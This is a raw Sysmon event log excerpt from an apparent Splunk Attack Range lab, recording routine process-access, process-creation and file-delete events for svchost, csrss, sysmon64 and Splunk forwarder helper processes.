10:51:50.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216859Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216858Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216857Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216856Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216855Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216854Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216853Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216852Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.061{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216851Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.061{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-11C6-6216-6304-000000003902}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216850Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.061{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-11C6-6216-6304-000000003902}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216849Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:50.062{4F8D34B0-11C6-6216-6304-000000003902}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000288660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:51.645{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=950911A39BF4852033BB1AEF58B39E34,SHA256=3D9BEB81C2EA2B6E577A41E22BCA2AEF4C142C2DAFFEFC4C186538216B6355A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216878Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.748{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44D1A25C091B605F0657DE224DEACC00,SHA256=342108741A168D1F84C3B8E4904B778C62C49286DF9AE88A32F38CDD85FC89E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216877Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-11C7-6216-6404-000000003902}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216876Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216875Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216874Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216873Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216872Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216871Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216870Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216869Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216868Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216867Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-11C7-6216-6404-000000003902}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216866Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.514{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-11C7-6216-6404-000000003902}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216865Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:51.515{4F8D34B0-11C7-6216-6404-000000003902}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 